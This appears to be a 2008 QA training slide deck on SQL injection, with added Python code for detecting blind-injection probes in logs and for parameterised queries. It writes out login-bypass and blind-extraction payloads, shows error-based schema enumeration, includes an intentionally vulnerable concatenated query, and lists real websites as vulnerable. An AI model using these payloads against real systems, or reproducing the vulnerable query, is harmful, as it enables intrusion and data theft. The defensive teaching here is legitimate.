Core QA Team
5th March 2008
Agenda
©Copyright Kenexa® 2004
What is SQL Injection
SQL Injection possibilities
Technologies affected by SQL Injections
• JSP, ASP, XML
• XSL, JavaScript, VB
• MFC and other ODBC-based tools
• APIs
• 3- and 4GL-based languages such as C, OCI, Pro*C, and COBOL
• Perl
• CGI scripts that access Oracle databases
• many more
Types of SQL Injections
Techniques in SQL Injections
• Authorization bypass
• Using the SELECT command
• Using the INSERT command
• Using SQL server stored procedures
How to use Blind SQL injection
USER_NAME() is a SQL Server function that returns the name of the current user. If the current user is dbo (administrator), the fifth press release will be returned. If not, the query will fail and no press release will be displayed.
Step 4 - By combining sub-queries and functions, we can ask more complex questions. The following example attempts to retrieve the name of a database table, one character at a time.
http://www.thecompany.com/pressRelease.jsp?pressReleaseID=5
AND ascii(lower(substring((SELECT TOP 1 name FROM sysobjects
WHERE xtype='U'), 1, 1))) > 109
Step 5 - If the server returns the fifth press release in response to this URL, we know that the first letter of the query's result comes after the letter "m" (ASCII character 109) in the alphabet. By making multiple requests, we can determine the precise ASCII value.
How to use Blind SQL injection
http://www.thecompany.com/pressRelease.jsp?pressReleaseID=5 AND
ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE
xtype='U'), 1, 1))) > 116
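The probing described in Steps 4 and 5 leaves a distinctive trail in the web server log: a run of requests from one client against one numeric parameter, each carrying a tautology or an ascii(substring(...)) comparison. The following detection script is an added example written for this deck, not code from the original slides; the Common Log Format lines are constructed, the client addresses are placeholders, and the indicator regexes are this example's own choice.

```python
"""Flag boolean-based blind SQL injection probes in web server access logs.

Added example for this deck, not code from the original slides.  The
Common Log Format lines below are constructed, the client IPs are
placeholders, and the indicator regexes are this example's own choice."""
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Constructed sample log.  Lines 2 and 3 carry the kind of probe the slides
# describe (an ascii(substring(...)) comparison, then a tautology, appended
# to a numeric id).  Line 1 is the legitimate request, line 4 an unrelated search.
SAMPLE_LOG = """\
10.0.0.5 - - [05/Mar/2008:10:01:02 +0000] "GET /pressRelease.jsp?pressReleaseID=5 HTTP/1.1" 200 5120
10.0.0.5 - - [05/Mar/2008:10:01:07 +0000] "GET /pressRelease.jsp?pressReleaseID=5%20AND%20ascii(lower(substring((SELECT%20TOP%201%20name%20FROM%20sysobjects%20WHERE%20xtype='U'),1,1)))%3E109 HTTP/1.1" 200 5120
10.0.0.5 - - [05/Mar/2008:10:01:09 +0000] "GET /pressRelease.jsp?pressReleaseID=5%20AND%201=1 HTTP/1.1" 200 5120
10.0.0.9 - - [05/Mar/2008:10:02:00 +0000] "GET /search.jsp?q=quarterly%20report HTTP/1.1" 200 880
"""

# Common Log Format: client, identd, user, [timestamp], "METHOD URL PROTO", status, size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)$'
)

# Indicators evaluated against each *decoded* query-string value.
INDICATORS = [
    # "AND 1=1", "or 2=2": the yes/no question at the heart of blind injection
    ("tautology", re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+", re.I)),
    # "' or 'a'='a" style string tautologies from the login-bypass slides
    ("quoted-tautology", re.compile(r"""['"]\s*or\s*['"][^'"]*['"]\s*=\s*['"]""", re.I)),
    # ascii(substring(...)) or ascii(lower(substring(...))): one character at a time
    ("char-extraction", re.compile(r"\bascii\s*\(\s*(?:lower\s*\()?\s*substring\s*\(", re.I)),
    # sub-query against the SQL Server catalogue
    ("schema-query", re.compile(r"\bselect\b.+?\bfrom\s+sysobjects\b", re.I)),
]


def parse_line(line):
    """Return the LOG_RE groups as a dict, or None for lines that do not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify_value(value):
    """Names of every indicator matching one decoded parameter value."""
    return [name for name, rx in INDICATORS if rx.search(value)]


def find_probes(log_text):
    """Return (ip, param, indicators) for each request whose query carries an indicator."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        # parse_qsl percent-decodes and turns '+' into spaces, so the regexes
        # see roughly what the database server would have seen.
        for param, value in parse_qsl(urlsplit(rec["url"]).query, keep_blank_values=True):
            found = classify_value(value)
            if found:
                hits.append((rec["ip"], param, found))
    return hits


def probes_per_source(hits):
    """Count hits per (ip, param): a run of them against one numeric parameter
    is the signature of the character-by-character extraction in Steps 4 and 5."""
    return Counter((ip, param) for ip, param, _ in hits)


if __name__ == "__main__":
    hits = find_probes(SAMPLE_LOG)
    for ip, param, found in hits:
        print(f"{ip} param={param} indicators={','.join(found)}")
    print(dict(probes_per_source(hits)))
```

The per-source count is the part worth alerting on: a single tautology can be a false positive, but dozens of requests from one client that differ only in the comparison threshold are the extraction loop itself.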
URLs vulnerable to Blind SQL Injection attack
http://www.bharatstudent.com/cafebharat/cafebharat.php?cat=2%20and%2
http://content-ind.cricinfo.com/wivzimsa/engine/current/match/298809.htm
http://www.minglebox.com/user.do?method=registerUser&error=true%20an
How to use SQL injections
How to use SQL injections
• Here is a sample basic HTML form with two inputs, login and
password.
<form method="post"
action="http://testasp.acunetix.com/login.asp">
<input name="tfUName" type="text" id="tfUName">
<input name="tfUPass" type="password" id="tfUPass">
</form>
SELECT id
FROM logins
WHERE username = 'Joe'
AND password = 'anything' OR 'x'='x'
How to use SQL injections
• As the inputs of the web application are not properly sanitised, the use of the single quotes has turned the WHERE clause into a two-part condition.
• The 'x'='x' part is guaranteed to be true regardless of what the first part contains.
• This will allow the attacker to bypass the login form without actually knowing a valid username / password combination!
• Depending on the actual SQL query, you may have to try some of these possibilities:
' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
URLs vulnerable to Blind SQL Injection attack
http://www.osmania.ac.in/ou/res07/20080126.jsp
http://www.powerscrap.com/frame.aspx?Login=true
How to use Advanced SQL injections
• The attacker could log in as the first user in the 'users' table, with the following input:
Username: ' or 1=1--
• The attacker wants to establish the names of the tables that the query operates on, and the names of the fields. To do this, the attacker uses the 'having' clause of the 'select' statement:
Username: ' having 1=1--
• So the attacker now knows the table name and column name of the first column in the query. They can continue through the columns by introducing each field into a 'group by' clause, as follows:
Username: ' group by users.id having 1=1--
How to use Advanced SQL injections
• (which produces the error…)
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'users.username' is invalid in the select list because it is not
contained in either an aggregate function or the GROUP BY clause.
/process_login.asp, line 35
How to avoid SQL Injections
• Filter out characters like single quote, double quote, slash, backslash, semicolon, and extended characters like NULL, carriage return, new line, etc., in all strings from:
- Input from users
- Parameters from the URL
- Values from cookies
For numeric values, convert the value to an integer before passing it into the SQL statement, or use ISNUMERIC to make sure it is an integer.
Configure "Startup and run SQL Server" to use a low-privilege user on the SQL Server Security tab.
Delete stored procedures that you are not using, such as:
master..Xp_cmdshell, xp_startmail, xp_sendmail, sp_makewebtask
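The login-bypass slides earlier in the deck and the countermeasures on this slide are two sides of one query, so the following added example shows them together: the concatenated login query that the ' or 'x'='x' input bypasses, the same query with bound parameters, the integer conversion this slide recommends for numeric parameters, and a generic error path so the driver's error text (the lever behind the 'group by' slide) never reaches the client. This is example code written for this deck, not code from the original slides; the 'logins' and 'press_releases' tables, their rows and the placeholder passwords are constructed here, and SQLite stands in for SQL Server.

```python
"""Login query built by concatenation beside the parameterised version, on an
in-memory SQLite database, plus integer conversion for numeric parameters
and a generic error path.

Added example for this deck, not code from the original slides.  The
'logins' and 'press_releases' tables, their rows and the placeholder
passwords are constructed here; SQLite stands in for SQL Server."""
import sqlite3

GENERIC_ERROR = "Login unavailable"


def make_db():
    """Constructed schema matching the slide's SELECT id FROM logins."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE logins (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO logins (username, password) VALUES (?, ?)",
        [("admin", "admin-pass-placeholder"), ("Joe", "joe-pass-placeholder")],
    )
    conn.execute("CREATE TABLE press_releases (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany(
        "INSERT INTO press_releases (id, title) VALUES (?, ?)",
        [(i, f"Release {i}") for i in range(1, 6)],
    )
    return conn


def login_vulnerable(conn, username, password):
    """The pattern the slides show being bypassed: user input is pasted into
    the statement text, so a quote in the input rewrites the WHERE clause."""
    sql = ("SELECT id FROM logins WHERE username = '" + username
           + "' AND password = '" + password + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_parameterised(conn, username, password):
    """Same query with bound parameters.  The statement text is fixed and the
    values travel separately, so "anything' OR 'x'='x" is compared as a
    password string, never parsed as SQL."""
    row = conn.execute(
        "SELECT id FROM logins WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def parse_id(raw):
    """The slide's advice for numeric values: convert to an integer before the
    value goes anywhere near the statement.  Returns None for anything else."""
    try:
        return int(raw)
    except (TypeError, ValueError):
        return None


def press_release_by_id(conn, raw_id):
    """Look up a press release by a request parameter such as pressReleaseID."""
    release_id = parse_id(raw_id)
    if release_id is None:
        return None  # "5 AND 1=1" never reaches SQL
    row = conn.execute("SELECT title FROM press_releases WHERE id = ?", (release_id,)).fetchone()
    return row[0] if row else None


def handle_login(conn, login_fn, username, password):
    """Wrap a login function so database errors are not echoed to the client.
    The 'group by' slide works only because the server repeats the driver's
    error text; here the caller sees a fixed message instead."""
    try:
        user_id = login_fn(conn, username, password)
    except sqlite3.Error:
        return ("error", GENERIC_ERROR)  # log the real exception server-side
    return ("ok", user_id) if user_id is not None else ("denied", None)


if __name__ == "__main__":
    db = make_db()
    print("vulnerable   :", login_vulnerable(db, "Joe", "anything' OR 'x'='x"))
    print("parameterised:", login_parameterised(db, "Joe", "anything' OR 'x'='x"))
    print("numeric id   :", press_release_by_id(db, "5"), press_release_by_id(db, "5 AND 1=1"))
    print("error path   :", handle_login(db, login_vulnerable, "'", "x"))
```

Parameter binding is the part that matters most: because the driver never lets the values alter the statement text, there is no list of characters to strip and nothing to forget, whereas the character filter on this slide has to be complete and applied on every input path to be effective.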
Next generation of Hacking
• Ethical Hacking
• Server side scripting
• Client side scripting
• Bluetooth Hacking
• Console Hacking
Tools for SQL Injection